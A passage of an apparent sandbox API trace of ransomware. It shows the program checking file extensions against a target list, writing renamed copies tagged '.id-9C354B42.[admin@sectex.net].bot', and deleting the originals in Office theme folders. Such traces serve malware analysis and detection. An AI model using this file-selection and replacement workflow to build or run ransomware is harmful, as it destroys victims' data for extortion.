	[0042.037] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0042.037] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\preview.gif")) returned 1
	[0042.038] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76
	[0042.038] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76
	[0042.038] lstrlenW (lpString=".doc") returned 4
	[0042.038] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0042.038] lstrlenW (lpString=".docx") returned 5
	[0042.038] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0042.038] lstrlenW (lpString=".pdf") returned 4
	[0042.038] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0042.038] lstrlenW (lpString=".xls") returned 4
	[0042.038] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0042.038] lstrlenW (lpString=".xlsx") returned 5
	[0042.038] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0042.038] lstrlenW (lpString=".ppt") returned 4
	[0042.038] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0042.038] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76
	[0042.038] lstrlenW (lpString=".zip") returned 4
	[0042.038] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0042.038] lstrlenW (lpString=".rar") returned 4
	[0042.038] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0042.038] lstrlenW (lpString=".bz2") returned 4
	[0042.038] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0042.038] lstrlenW (lpString=".7z") returned 3
	[0042.038] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0042.038] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76
	[0042.038] lstrlenW (lpString=".dbf") returned 4
	[0042.038] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0042.038] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76
	[0042.038] lstrlenW (lpString=".1cd") returned 4
	[0042.038] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0042.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76
	[0042.039] lstrlenW (lpString=".jpg") returned 4
	[0042.039] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0042.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76
	[0042.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76
	[0042.039] lstrlenW (lpString=".doc") returned 4
	[0042.039] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0042.039] lstrlenW (lpString=".docx") returned 5
	[0042.039] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0042.039] lstrlenW (lpString=".pdf") returned 4
	[0042.039] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0042.039] lstrlenW (lpString=".xls") returned 4
	[0042.039] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0042.039] lstrlenW (lpString=".xlsx") returned 5
	[0042.039] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0042.039] lstrlenW (lpString=".ppt") returned 4
	[0042.039] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0042.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76
	[0042.039] lstrlenW (lpString=".zip") returned 4
	[0042.039] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0042.039] lstrlenW (lpString=".rar") returned 4
	[0042.039] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0042.039] lstrlenW (lpString=".bz2") returned 4
	[0042.039] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0042.039] lstrlenW (lpString=".7z") returned 3
	[0042.039] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0042.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76
	[0042.039] lstrlenW (lpString=".dbf") returned 4
	[0042.039] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0042.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76
	[0042.039] lstrlenW (lpString=".1cd") returned 4
	[0042.039] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0042.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76
	[0042.040] lstrlenW (lpString=".jpg") returned 4
	[0042.040] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0042.040] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0042.040] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0042.040] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0
	[0042.041] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=25234) returned 1
	[0042.041] CloseHandle (hObject=0x1f0) returned 1
	[0042.041] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png")) returned 0x20
	[0042.041] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0042.041] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0
	[0042.041] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0042.041] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0042.041] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0042.041] GetLastError () returned 0x0
	[0042.041] ReadFile (in: hFile=0x1f0, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x6292, lpOverlapped=0x0) returned 1
	[0042.043] WriteFile (in: hFile=0x1a0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x62a0, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x62a0, lpOverlapped=0x0) returned 1
	[0042.044] ReadFile (in: hFile=0x1f0, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0042.044] WriteFile (in: hFile=0x1a0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0042.044] SetEndOfFile (hFile=0x1a0) returned 1
	[0042.045] CloseHandle (hObject=0x1a0) returned 1
	[0042.045] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0042.046] SetEndOfFile (hFile=0x1f0) returned 1
	[0042.046] CloseHandle (hObject=0x1f0) returned 1
	[0042.046] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0042.047] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png")) returned 1
	[0042.047] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77
	[0042.047] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77
	[0042.047] lstrlenW (lpString=".doc") returned 4
	[0042.047] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0042.047] lstrlenW (lpString=".docx") returned 5
	[0042.047] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0042.047] lstrlenW (lpString=".pdf") returned 4
	[0042.047] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0042.047] lstrlenW (lpString=".xls") returned 4
	[0042.047] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0042.047] lstrlenW (lpString=".xlsx") returned 5
	[0042.047] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0042.047] lstrlenW (lpString=".ppt") returned 4
	[0042.047] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0042.047] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77
	[0042.047] lstrlenW (lpString=".zip") returned 4
	[0042.047] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0042.047] lstrlenW (lpString=".rar") returned 4
	[0042.047] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0042.047] lstrlenW (lpString=".bz2") returned 4
	[0042.047] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0042.047] lstrlenW (lpString=".7z") returned 3
	[0042.048] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0042.048] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77
	[0042.048] lstrlenW (lpString=".dbf") returned 4
	[0042.048] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0042.048] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77
	[0042.048] lstrlenW (lpString=".1cd") returned 4
	[0042.048] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0042.048] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77
	[0042.048] lstrlenW (lpString=".jpg") returned 4
	[0042.048] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0042.048] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77
	[0042.048] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77
	[0042.048] lstrlenW (lpString=".doc") returned 4
	[0042.048] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0042.048] lstrlenW (lpString=".docx") returned 5
	[0042.048] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0042.048] lstrlenW (lpString=".pdf") returned 4
	[0042.048] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0042.048] lstrlenW (lpString=".xls") returned 4
	[0042.048] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0042.048] lstrlenW (lpString=".xlsx") returned 5
	[0042.048] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0042.048] lstrlenW (lpString=".ppt") returned 4
	[0042.048] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0042.048] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77
	[0042.048] lstrlenW (lpString=".zip") returned 4
	[0042.048] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0042.048] lstrlenW (lpString=".rar") returned 4
	[0042.049] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0042.049] lstrlenW (lpString=".bz2") returned 4
	[0042.049] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0042.049] lstrlenW (lpString=".7z") returned 3
	[0042.049] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0042.049] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77
	[0042.049] lstrlenW (lpString=".dbf") returned 4
	[0042.049] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0042.049] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77
	[0042.049] lstrlenW (lpString=".1cd") returned 4
	[0042.049] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0042.049] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77
	[0042.049] lstrlenW (lpString=".jpg") returned 4
	[0042.049] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0042.049] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0042.049] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0042.049] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0
	[0042.050] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=2985) returned 1
	[0042.050] CloseHandle (hObject=0x1f0) returned 1
	[0042.050] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif")) returned 0x20
	[0042.050] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0042.050] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0
	[0042.050] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0042.050] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0042.050] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0042.052] GetLastError () returned 0x0
	[0042.052] ReadFile (in: hFile=0x1f0, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0xba9, lpOverlapped=0x0) returned 1
	[0042.054] WriteFile (in: hFile=0x1a0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xbb0, lpOverlapped=0x0) returned 1
	[0042.054] ReadFile (in: hFile=0x1f0, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0042.055] WriteFile (in: hFile=0x1a0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0042.055] SetEndOfFile (hFile=0x1a0) returned 1
	[0042.055] CloseHandle (hObject=0x1a0) returned 1
	[0042.055] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0042.055] SetEndOfFile (hFile=0x1f0) returned 1
	[0042.056] CloseHandle (hObject=0x1f0) returned 1
	[0042.056] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0042.057] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif")) returned 1
	[0042.057] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74
	[0042.057] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74
	[0042.057] lstrlenW (lpString=".doc") returned 4
	[0042.057] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0042.057] lstrlenW (lpString=".docx") returned 5
	[0042.057] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0042.057] lstrlenW (lpString=".pdf") returned 4
	[0042.057] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0042.057] lstrlenW (lpString=".xls") returned 4
	[0042.057] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0042.057] lstrlenW (lpString=".xlsx") returned 5
	[0042.057] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0042.057] lstrlenW (lpString=".ppt") returned 4
	[0042.057] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0042.057] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74
	[0042.057] lstrlenW (lpString=".zip") returned 4
	[0042.057] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0042.057] lstrlenW (lpString=".rar") returned 4
	[0042.057] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0042.057] lstrlenW (lpString=".bz2") returned 4
	[0042.057] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0042.057] lstrlenW (lpString=".7z") returned 3
	[0042.057] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0042.057] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74
	[0042.057] lstrlenW (lpString=".dbf") returned 4
	[0042.057] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0042.057] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74
	[0042.058] lstrlenW (lpString=".1cd") returned 4
	[0042.058] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0042.058] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74
	[0042.058] lstrlenW (lpString=".jpg") returned 4
	[0042.058] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0042.058] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74
	[0042.058] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74
	[0042.058] lstrlenW (lpString=".doc") returned 4
	[0042.058] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0042.058] lstrlenW (lpString=".docx") returned 5
	[0042.058] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0042.058] lstrlenW (lpString=".pdf") returned 4
	[0042.058] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0042.058] lstrlenW (lpString=".xls") returned 4
	[0042.058] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0042.058] lstrlenW (lpString=".xlsx") returned 5
	[0042.058] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0042.058] lstrlenW (lpString=".ppt") returned 4
	[0042.058] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0042.058] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74
	[0042.058] lstrlenW (lpString=".zip") returned 4
	[0042.058] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0042.058] lstrlenW (lpString=".rar") returned 4
	[0042.058] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0042.058] lstrlenW (lpString=".bz2") returned 4
	[0042.058] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0042.058] lstrlenW (lpString=".7z") returned 3
	[0042.058] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0042.058] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74
	[0042.058] lstrlenW (lpString=".dbf") returned 4
	[0042.058] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0042.058] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74
	[0042.058] lstrlenW (lpString=".1cd") returned 4
	[0042.058] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0042.059] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74
	[0042.059] lstrlenW (lpString=".jpg") returned 4
	[0042.059] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0042.059] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0042.059] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0042.059] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0042.442] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=19780) returned 1
	[0042.442] CloseHandle (hObject=0x1fc) returned 1
	[0042.442] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png")) returned 0x20
	[0042.442] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0042.442] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0042.442] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0042.442] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0042.442] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0042.443] GetLastError () returned 0x0
	[0042.443] ReadFile (in: hFile=0x1fc, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x4d44, lpOverlapped=0x0) returned 1
	[0042.518] WriteFile (in: hFile=0x1c0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x4d50, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x4d50, lpOverlapped=0x0) returned 1
	[0043.041] ReadFile (in: hFile=0x1fc, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
